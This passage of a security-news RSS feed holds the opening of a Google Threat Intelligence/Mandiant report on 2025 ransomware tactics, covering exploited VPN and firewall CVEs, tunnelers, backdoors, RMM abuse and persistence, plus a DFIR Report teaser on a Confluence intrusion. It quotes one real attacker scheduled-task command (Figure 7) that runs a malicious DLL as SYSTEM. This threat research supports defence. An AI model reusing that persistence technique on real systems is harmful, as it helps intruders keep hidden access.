<p><span>The potential of AI, especially generative AI, is immense. As innovation moves forward, the industry needs security standards for building and deploying AI responsibly. That's why we introduced the </span><a href="https://blog.google/technology/safety-security/introducing-googles-secure-ai-framework/" rel="noopener" target="_blank"><span>Secure AI Framework (SAIF)</span></a><span>, a conceptual framework to secure AI systems. We've shared a comprehensive </span><a href="https://ai.google.dev/" rel="noopener" target="_blank"><span>toolkit for developers</span></a><span> with </span><a href="https://ai.google.dev/responsible" rel="noopener" target="_blank"><span>resources and guidance</span></a><span> for designing, building, and evaluating AI models responsibly. We've also shared best practices for </span><a href="https://ai.google.dev/responsible/docs/safeguards" rel="noopener" target="_blank"><span>implementing safeguards</span></a><span>, </span><a href="https://ai.google.dev/responsible/docs/evaluation#red-teaming" rel="noopener" target="_blank"><span>evaluating model safety</span></a><span>, and </span><a href="https://blog.google/technology/safety-security/googles-ai-red-team-the-ethical-hackers-making-ai-safer/" rel="noopener" target="_blank"><span>red teaming</span></a><span> to test and secure AI systems. </span></p>
<p><span>Google also continuously invests in AI research, helping to ensure </span><a href="https://ai.google/static/documents/ai-responsibility-update-published-february-2025.pdf" rel="noopener" target="_blank"><span>AI is built responsibly</span></a><span>, </span><span>and that we’re leveraging its potential to automatically find risks. Last year, we introduced </span><a href="https://blog.google/technology/safety-security/cybersecurity-updates-summer-2025/" rel="noopener" target="_blank"><span>Big Sleep</span></a><span>, an AI agent developed by Google DeepMind and Google Project Zero, that actively searches and finds unknown security vulnerabilities in software. Big Sleep has since found its first real-world security vulnerability and assisted in finding a vulnerability that was imminently going to be used by threat actors, which GTIG was able to cut off beforehand. We’re also experimenting with AI to not only find vulnerabilities, but also patch them. We recently introduced </span><a href="https://deepmind.google/discover/blog/introducing-codemender-an-ai-agent-for-code-security/" rel="noopener" target="_blank"><span>CodeMender</span></a><span>, an experimental AI-powered agent utilizing the advanced reasoning capabilities of our Gemini models to automatically fix critical code vulnerabilities.</span><span> </span></p>
<h3><span>About the Authors</span></h3>
<p><span>Google Threat Intelligence Group focuses on identifying, analyzing, mitigating, and eliminating entire classes of cyber threats against Alphabet, our users, and our customers. Our work includes countering threats from government-backed attackers, targeted zero-day exploits, coordinated information operations (IO), and serious cyber crime networks. We apply our intelligence to improve Google's defenses and protect our users and customers. </span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Another Confluence Bites the Dust: Falling to ELPACO-team Ransomware]]></title>
<description><![CDATA[Key Takeaways The DFIR Report Services Table of Contents: Case Summary In late June 2024, an unpatched Confluence server was compromised via CVE-2023-22527, a template injection vulnerability, first from IP address 45.227.254[.]124, which just ran whoami and exited. Shortly thereafter, a differen...]]></description>
<link>https://tsecurity.de/de/3501487/it-security-nachrichten/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501487/it-security-nachrichten/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/</guid>
<pubDate>Fri, 08 May 2026 23:21:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key Takeaways The DFIR Report Services Table of Contents: Case Summary In late June 2024, an unpatched Confluence server was compromised via CVE-2023-22527, a template injection vulnerability, first from IP address 45.227.254[.]124, which just ran whoami and exited. Shortly thereafter, a different IP address used the same exploit, running curl to deploy a Metasploit payload […]</p>
<p>The post <a href="https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/">Another Confluence Bites the Dust: Falling to ELPACO-team Ransomware</a> appeared first on <a href="https://thedfirreport.com/">The DFIR Report</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape]]></title>
<description><![CDATA[Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark

Introduction 
Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive thr...]]></description>
<link>https://tsecurity.de/de/3501417/it-security-nachrichten/ransomware-under-pressure-tactics-techniques-and-procedures-in-a-shifting-threat-landscape/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501417/it-security-nachrichten/ransomware-under-pressure-tactics-techniques-and-procedures-in-a-shifting-threat-landscape/</guid>
<pubDate>Fri, 08 May 2026 23:19:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span><strong> </strong></h3>
<p><span>Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region. In recent years ransomware operations have evolved, creating a robust ecosystem that has lowered the barrier to entry via the commoditization and specialization of the supporting underground communities, which is exemplified by the proliferation of the ransomware-as-a-service (RaaS) business model. While ransomware remains a dominant threat due to the volume of activity and the potential for serious operational disruptions, we have observed multiple indicators that suggest the overall profitability of ransomware operations is in decline. This trend is likely the result of multiple factors, including improved cybersecurity practices, increased ability of organizations to recover, and declining ransom payment amounts and rates. Further, numerous disruptions have impacted the ransomware ecosystem in recent years, from external forces like law enforcement operations to internal conflict between actors; both have led to the disappearance or significant debilitation of previously prolific RaaS groups like LockBit, ALPHV, Basta, and RansomHub. However, despite these shakeups, the well-established Qilin and Akira RaaS brands rose up to fill the vacuum, leading to a record high number of victims posted to data leak sites (DLS) in 2025 (Figure 1).</span></p>
<p><span>This report provides an overview of the ransomware landscape and common tactics, techniques, and procedures (TTPs) directly observed in the 2025 ransomware incidents that Mandiant Consulting responded to. In this analysis, we excluded activity focused only on data theft extortion. Key insights include: </span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>In a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>77 percent of analyzed ransomware intrusions included suspected data theft, a notable uptick from 57 percent of incidents in 2024.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In approximately 43% of ransomware intrusions we responded to in 2025, the threat actors were observed targeting virtualization infrastructure, an increase from 29% in 2024.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>REDBIKE was the most frequently deployed ransomware family, accounting for 30 percent of analyzed ransomware incidents.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Several trends from prior years remained consistent, including a decreased use of certain intrusion tools like BEACON and MIMIKATZ and a plateau in the reliance of remote management tools.</span></p>
</li>
</ul>
<p><span>Google Threat Intelligence Group (GTIG) analysis of TTPs relies primarily on data from Mandiant engagements and therefore represents only a sample of global ransomware intrusion activity. These incidents involved the post-compromise deployment of ransomware following network intrusion activity, with the majority of incidents also involving data theft extortion. The impacted organizations were based across the Asia Pacific region, Europe, North America, and South America and within nearly every industry sector. </span></p>
<p><span>While we anticipate ransomware will remain one of the most impactful cyber threats in 2026, the reduction in profits may cause some threat actors to leverage other monetization methods and tactics, such as continuing targeting shifts, further increasing data theft extortion operations, the use of more aggressive extortion tactics, or opportunistically using access to victim environments for secondary monetization mechanisms. </span></p>
<p><span>Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-protection-and-containment-strategies"><span>Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment</span></a>.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig1.max-1000x1000.png" alt="Top 10 DLS in 2025 and associated ransomware families">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="w4gzu">Figure 1: Top 10 DLS in 2025 and associated ransomware families</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>2025 Ransomware Landscape </span></h3>
<p><span>In 2025, the ransomware landscape became increasingly crowded, with a record high number of unique DLS with at least one post. The growing pool of ransomware actors engaging in extortion operations combined with persistent targeted efforts by law enforcement and enhanced organizational security has likely shrunk profit margins for ransomware operators in recent years. In response, threat actors appear to be adopting new strategies from who they target to the technologies they use. This evolution has included an apparent increase in targeting smaller organizations, and a possible focus on data theft extortion without ransomware deployment. Furthermore, threat actors are incorporating artificial intelligence (AI) into aspects of their operations (e.g., negotiations) and leveraging Web3 technologies to bolster the resilience of their infrastructure. While we see expansions in these aspects, internal and external disruptions seen in recent years have prompted some threat actors to become more cautious resulting in more rigorous vetting of potential partners. We expect ransomware actors to continue to adjust and evolve their tactics in an attempt to maintain some level of success or regain the levels of profitability they reached historically.</span></p>
<p><span>2025 marked a record year for the number of posts on DLS, with the total number of posts surpassing that of 2024 by almost 50%. Despite these record setting numbers, we caution against relying solely on DLS data to ascertain the overall volume of ransomware activity. Threat actors typically only create DLS posts for victims that have refused to initiate or complete extortion negotiations. Public reporting </span><a href="https://www.coveware.com/blog/2026/2/3/mass-data-exfiltration-campaigns-lose-their-edge-in-q4-2025#payments" rel="noopener" target="_blank"><span>indicates</span></a><span> that ransom payment rates have been declining, which could, at least partially, fuel the steady increase of posts on shaming sites. It can also be difficult to differentiate between DLS posts associated with data theft-only operations and those that also include ransomware deployment. For example, threat actors associated with the CL0P DLS continue to occasionally deploy ransomware but have shifted primarily to data-theft-extortion-only operations. So while CL0P was the third most prolific DLS in 2025, the vast majority of incidents associated with these posts did not involve ransomware. We have also observed numerous instances of threat actors, such as those associated with BABUK 2.0, fabricating and exaggerating claims as well as reposting claims that would at least slightly inflate victim counts. Finally, not all claims are of equal significance. For example, between December 2024 and January 2025, FUNKSEC was the highest volume DLS; however, many of the associated incidents appeared to be lower impact events involving compromising websites for data theft extortion.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig2.max-1000x1000.png" alt="Volume of posts and unique data leak sites from 2020 through 2025">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="w4gzu">Figure 2: Volume of posts and unique data leak sites from 2020 through 2025</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Although ransomware has historically been highly lucrative, recent disruptions and enhanced organizational security may be impacting these profits. Public reporting indicates that both ransom payment rates and average ransom demands are decreasing. In February 2026, Coveware </span><a href="https://www.coveware.com/blog/2026/2/3/mass-data-exfiltration-campaigns-lose-their-edge-in-q4-2025" rel="noopener" target="_blank"><span>reported</span></a><span> that ransom payment rates have generally decreased over the past few years, reaching a historic low in Q4 2025. Similarly, in June 2025, Sophos </span><a href="https://assets.sophos.com/X24WTUEQ/at/9brgj5n44hqvgsp5f5bqcps/sophos-state-of-ransomware-2025.pdf" rel="noopener" target="_blank"><span>reported</span></a><span> that the average ransom demand has dropped by one-third during the last year, to $1.34 million in 2025 from $2 million in 2024. Public reporting further suggests that organizations that have been impacted by ransomware are able to recover more easily, which also likely contributes to reduced ransom payments. For example, in February 2025, Unit 42 </span><a href="https://www.paloaltonetworks.com/engage/unit42-2025-global-incident-response-report" rel="noopener" target="_blank"><span>reported</span></a><span> that companies have improved their ability to recover from ransomware incidents; nearly half of ransomware victims were able to restore from backup in 2024 compared to around 28% in 2023 and only 11% in 2022.</span></p>
<p><span>Improvements in organizational security and the growing ability of victims to recover from ransomware attacks may be leading some adversaries to view data theft as a more reliable method for securing payments. In intrusions investigated by Mandiant, we observed a decline in traditional ransomware deployment coinciding with a rise in data theft extortion. Further, some RaaS programs are providing data-theft-extortion-only options in addition to ransomware, which may reflect demand from their customer base. It is also plausible that more robust security posture, particularly at larger organizations, is forcing threat actors to adjust their targeting to focus on a higher volume of attacks targeting smaller organizations with less mature security programs. Analysis of organization size (based on estimated number of employees, when available) of victims posted on DLS indicates threat actors have shifted away from larger organizations and toward smaller organizations (Figure 3). Threat actors have directly commented on this trend. For example, in leaked April and May 2024 chats, a Basta actor theorized that targeting smaller company networks would be more effective compared to "normal networks."</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig3.max-1000x1000.png" alt="Percentage of DLS posts for victims with an estimated company size of less than 200 employees">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="w4gzu">Figure 3: Percentage of DLS posts for victims with an estimated company size of less than 200 employees</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>During 2025, numerous disruptive events impacted the ransomware ecosystem, including both a range of law enforcement and government actions as well as threat actor-related data leaks and disputes, at least some of which appear to be the result of turmoil amongst threat actors (Figure 4). Not only did many of these events result in direct disruption such as arrests, seizures, and sanctions, but some also forced threat actors to shift TTPs and provided valuable insights to security researchers on the inner workings and individuals behind some ransomware operations. Yet the dominance of long-standing Qilin and Akira brands in 2025 demonstrate the resilience of ransomware actors and their ability to fill voids following takedowns and exit scams of competing RaaS operators. There are some indications that the overall instability in the ransomware threat landscape, coupled with pressure from law enforcement, have caused ransomware teams to increase their operational security, which has translated into more rigorous vetting of potential affiliates. We've also seen some private or semi-private offerings gain prominence. For example, 2025 marked the first time in four years that one of the top two most prolific RaaS operations was not public; while Akira appears to have affiliates, they do not have a public advertisement for their operations.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig4.max-1000x1000.png" alt="Key disruptive events impacting the ransomware landscape">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 4: Key disruptive events impacting the ransomware landscape</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>In 2025, ransomware actors continued to evolve their operations by adopting emerging or established technologies to increase the efficiency and efficacy of their operations. Some threat actors are integrating Web3 technologies into their operations, likely as a way to make their infrastructure more resilient to takedown and detection efforts. The Cry0 RaaS claims to leverage Internet Computer Protocol (ICP) blockchain to host negotiation sites via decentralized canister smart contracts, enabling clearnet access without requiring TOR while DEADLOCK ransomware has leveraged Polygon smart contracts in order to store and rotate C2 infrastructure. We have also seen threat actors incorporating AI-features into their RaaS offerings: the GLOBAL RaaS reportedly has an AI-assisted chat that provides victim analysis and assists with communications, CHAOS purportedly includes a "built-in AI chatbot," although its specific use is unclear, while BERT allegedly uses AI-based data analysis to identify victim pressure points. Finally, we have observed twice the number of ransomware families that were capable of running on both Windows and Linux systems compared to 2024. This could suggest that threat actors are shifting toward cross-platform ransomware rather than creating multiple, separate variants to support their operations.</span></p>
<h3><span>Commonly Observed Tactics, Techniques, and Procedures</span></h3>
<p><span>The following sections discuss trends in the TTPs observed in post-compromise ransomware deployment incidents, organized into the corresponding stages of GTIG's attack lifecycle model (Figure 5). The TTPs outlined in this section were observed at Mandiant-led ransomware investigations during 2025.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig5.max-1000x1000.png" alt="Attack lifecycle associated with 2025 ransomware incidents">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 5: Attack lifecycle associated with 2025 ransomware incidents</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Initial Access</span></h4>
<p><span>During 2025, the most commonly identified initial access vector in ransomware incidents was the exploitation or suspected exploitation of vulnerabilities, accounting for a third of incidents, followed by web compromise, stolen credentials, and bruteforce attacks (Figure 6). Notably, while voice phishing was a commonly leveraged tactic in several high profile data theft extortion campaigns, it was not observed in ransomware incidents. This year we included suspected initial access vectors in our analysis to provide a more holistic view, given that some vectors can be more difficult to verify. For example, it can be difficult to confirm the use of stolen credentials, given that the credentials may have been harvested in a separate incident that occurred weeks prior or even on a personal device. Conversely, bruteforce attacks tend to generate many log entries that can be used to confirm the vector.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Throughout 2025 we observed ransomware operators leveraging a wide range of exploits for initial access (Table 1). While the majority of observed or suspected exploitation activity involved vulnerabilities disclosed prior to 2025, we observed multiple indicators that at least some ransomware actors were leveraging </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review"><span>zero-day exploits</span></a><span> in their operations.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In the majority of instances where exploits were used or suspected, the threat actors targeted vulnerabilities in common VPNs and firewalls such as Fortinet (CVE-2024-55591, CVE-2024-21762, and CVE-2019-6693), SonicWall (CVE-2024-40766), Palo Alto (CVE-2024-3400), and Citrix (CVE-2023-4966).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We also observed malicious actors successfully exploit a variety of other exposed services, including Veritas Backup Exec, Zoho ManageEngine, Microsoft Sharepoint, and SAP Netweaver.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We observed evidence that multiple ransomware and/or data theft extortion operations leveraged zero-day vulnerabilities for initial access throughout the year.</span></p>
</li>
<ul>
<li aria-level="3">
<p role="presentation"><span>During mid-July 2025, an UNC6357 actor attempted to exploit Microsoft Sharepoint vulnerabilities CVE-2025-53770 and CVE-2025-53771 to gain access to the victim's environment and ultimately deploy LOCKBIT.WARLOCK. While this was observed after disclosure of the vulnerability, we observed evidence—including log data and public </span><a href="https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/" rel="noopener" target="_blank"><span>reporting</span></a><span>—suggesting the same actor attempted to exploit the same vulnerability as a zero-day.</span></p>
</li>
<li aria-level="3">
<p role="presentation"><span>In August 2025, GTIG assessed with high confidence that UNC2165 leveraged a zero-day exploit for CVE-2025-8088 to deploy MYTHICAGENT.</span></p>
</li>
<li aria-level="3">
<p role="presentation"><span>While the observed incidents did not involve ransomware deployment, threat actors associated with the CL0P DLS may have </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation"><span>exploited</span></a><span> CVE-2025-61882 as a zero-day against Oracle EBS environments. The CL0P DLS has been associated with multifaceted extortion operations involving CLOP ransomware; however, it is primarily associated with data theft extortion operations rather than ransomware deployment.</span></p>
</li>
</ul>
</ul>
<li aria-level="1">
<p role="presentation"><span>We observed multiple threat clusters leverage malvertising and/or search engine optimization (SEO) tactics to distribute malware payloads for initial access, including both ransomware operators themselves and initial access partners that ultimately led to follow-on ransomware intrusions. </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed multiple UNC6016 malware distribution operations leverage malvertising to distribute malware payloads masquerading as legitimate software tools such as PuTTY to gain initial access. At least a portion of observed UNC6016 access operations ultimately lead to NITROGEN or RHYSIDA ransomware deployments.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>UNC2465 routinely leveraged malvertising and/or SEO techniques to distribute SMOKEDHAM payloads masquerading as RVTOOLs installers.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>While less frequent this year, many threat actors continued to rely on stolen credentials for initial access. In 21% of intrusions where the initial access vector was identified, the threat actor leveraged compromised legitimate credentials to access the victim environment, typically involving authentication to a victim's VPN or a Remote Desktop Protocol (RDP) login. While the source of stolen credentials cannot always be determined, actors can obtain them via numerous techniques including purchasing credentials from underground forums or using credentials exposed in infostealer logs.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We continued to see a subset of actors leveraging bruteforce attacks against victims' VPNs. In one incident involving ransomware that identified itself as Daixin, the threat actor conducted periodic bruteforce attacks against various VPN user accounts over the course of nearly a year before successfully gaining initial access.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We observed multiple intrusions where the ransomware operator gained access to the victim through an intermediary network. </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed multiple disparate ransomware operations that leveraged network access to subsidiaries of victims to subsequently access the victim's network. In one instance the threat actor leveraged access to the subsidiary to bruteforce access to the victim's VPN.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In a separate incident, the threat actor leveraged a VPN connection owned by a third-party vendor to access an operational technology (OT) system within the victim's environment.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>During one intrusion leading to CLOP ransomware deployment, UNC5833 gained access from an initial access partner who impersonated a helpdesk user to social engineer an employee via a Microsoft Teams chat session to install Quick Assist. While we observed limited use of social engineering by ransomware operators during 2025 in incidents we observed, it remained a popular technique among financially motivated intrusion actors more broadly.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig6.max-1000x1000.png" alt="Initial intrusion vectors">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 6: Initial intrusion vectors</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>Vendor</span></strong></p>
</td>
<td>
<p><strong><span>Product</span></strong></p>
</td>
<td>
<p><strong><span>CVE</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Fortinet</span></p>
</td>
<td>
<p><span>FortiOS / FortiProxy</span></p>
</td>
<td>
<p><span>CVE-2024-21762</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Veritas</span></p>
</td>
<td>
<p><span>Backup Exec</span></p>
</td>
<td>
<p><span>CVE-2021-27877</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Veritas</span></p>
</td>
<td>
<p><span>Backup Exec</span></p>
</td>
<td>
<p><span>CVE-2021-27878</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Zoho</span></p>
</td>
<td>
<p><span>ManageEngine ADSelfService Plus</span></p>
</td>
<td>
<p><span>CVE-2021-40539</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Fortinet</span></p>
</td>
<td>
<p><span>FortiOS / FortiProxy</span></p>
</td>
<td>
<p><span>CVE-2024-55591</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Fortinet</span></p>
</td>
<td>
<p><span>FortiOS</span></p>
</td>
<td>
<p><span>CVE-2019-6693</span></p>
</td>
</tr>
<tr>
<td>
<p><span>SonicWall</span></p>
</td>
<td>
<p><span>SonicOS</span></p>
</td>
<td>
<p><span>CVE-2024-40766</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Citrix</span></p>
</td>
<td>
<p><span>NetScaler</span></p>
</td>
<td>
<p><span>CVE-2023-4966</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Microsoft</span></p>
</td>
<td>
<p><span>SharePoint</span></p>
</td>
<td>
<p><span>CVE-2025-53771</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Microsoft</span></p>
</td>
<td>
<p><span>SharePoint</span></p>
</td>
<td>
<p><span>CVE-2025-53770</span></p>
</td>
</tr>
<tr>
<td>
<p><span>SAP</span></p>
</td>
<td>
<p><span>Netweaver</span></p>
</td>
<td>
<p><span>CVE-2025-31324</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Palo Alto</span></p>
</td>
<td>
<p><span>PAN-OS GlobalProtect</span></p>
</td>
<td>
<p><span>CVE-2024-3400</span></p>
</td>
</tr>
<tr>
<td>
<p><span>CrushFTP</span></p>
</td>
<td>
<p><span>CrushFTP</span></p>
</td>
<td>
<p><span>CVE-2025-31161</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<span>Table 1: <span>Vulnerabilities likely leveraged for initial access in 2025 ransomware incidents</span></span></div></div>
<div class="block-paragraph_advanced"><h4><span>Establish Foothold and Maintain Presence</span></h4>
<p><span>Once inside victim environments, threat actors engaged in many different techniques to establish a foothold and maintain presence, including leveraging valid credentials, tunnelers, backdoors, or legitimate remote access tools. Threat actors continued to use remote management tools to support both these phases of the attack lifecycle, albeit at slightly lower rates than 2024.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Ransomware actors consistently relied on compromised credentials to establish a foothold in victim environments. </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Once authenticated to network services, they also often used these credentials to provision or modify highly privileged accounts to maintain access. For example, in a RIFTTEAR incident, the threat actor authenticated via Kerberos to a privileged system, provisioned an AD domain user, and added the account to a high-privileged group. We also saw multiple threat actors change passwords to root accounts on ESXi hosts.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In 2025, an increased number of threat actors adopted tunnelers to support these phases compared to 2024 observations. Observed tunnelers included publicly available offerings such as PYSOXY, CHISEL, CLOUDFLARED, RPIVOT, and REVSOCKS.CLIENT alongside seemingly private tunnelers like LIONSHARE, VIPERTUNNEL, and BLUNDERBLIGHT.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a LOCKBIT.WARLOCK incident, the exploitation of a Microsoft SharePoint vulnerability enabled remote code execution, granting the access required to install CLOUDFLARED from Github via the Windows msiexec command-line utility, establishing an outbound-only C2 channel.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>A subset of threat actors deployed backdoors—including CORNFLAKE.V3.JAVASCRIPT, SQUIDGATE, FIREHAWK, HAVOCDEMON, and SMOKEDHAM—to establish a foothold.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>UNC6021, a suspected FIN6 threat cluster, used SQUIDGATE's built-in functionality to deploy FIREHAWK, a toehold backdoor written in C. Consistent with FIN6 infections, a social engineering engagement on LinkedIn prompted a user to access a malicious website hosting a ZIP archive containing the BULLZLINK downloader. Once executed, it retrieved a dropper variant of SQUIDSLEEP with an embedded SQUIDGATE payload.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In 2025, multiple ransomware actors relied on remote monitoring and management tools (RMMs) for multiple phases of the attack lifecycle. We observed a variety of these legitimate tools abused in incidents, including ANYDESK, SCREENCONNECT, and SPLASHTOP (Table 2). </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In an UNC2465 incident, several weeks after the initial intrusion, the threat actors installed the TERAMIND RMM alongside Time Doctor. Time Doctor is an employee monitoring tool, which is capable of taking screenshots and screen recordings of the system as well as track website and application usage.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors continued to reduce their reliance on BEACON in ransomware operations; we observed BEACON in around 2% of intrusions, a decrease from an already diminished 11% in 2024. However, multiple threat clusters used other post-exploitation frameworks like AdaptixC2 (ADAPTAGENT), Exploration C2 (EXPLORATIONC2), or MYTHIC.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In an UNC2165 RANSOMHUB incident, the threat actors used COM hijacking as a persistence mechanism for MYTHIC. UNC2165 created MYTHIC in the "Temp" folder, renamed it to "msedge.dll," and modified the registry key for InprocServer32 to point to the MYTHIC payload.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors often used native Windows features to create services and register scheduled tasks to programmatically and recurrently execute malware, such as backdoors or tunnelers. For example, in a RHYSIDA incident, threat actors registered a scheduled task to run the LIONSHARE tunneler every 12 hours (Figure 7).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In a TridentLocker-branded incident, the threat actors uploaded WAVECALL, a downloader implemented as a .NET assembly, to a victim server running CrushFTP. They modified the command-line instruction used for processing file previews, replacing the configured executable paths for ImageMagick and ExifTool utilities with the WAVECALL assembly, thereby executing it whenever a file preview operation was initiated. The actors later reverted this configuration and updated the command-line instruction to execute a Base64-encoded PowerShell script to deploy a follow-on payload.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/Create /SC MINUTE /MO 720 /TN Reg /TR "C:\Windows\System32\rundll32.exe C:\windows\system32\config\red.dll Test" /ru system</code></pre>
<p><span>Figure 7: Scheduled task for LIONSHARE</span></p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
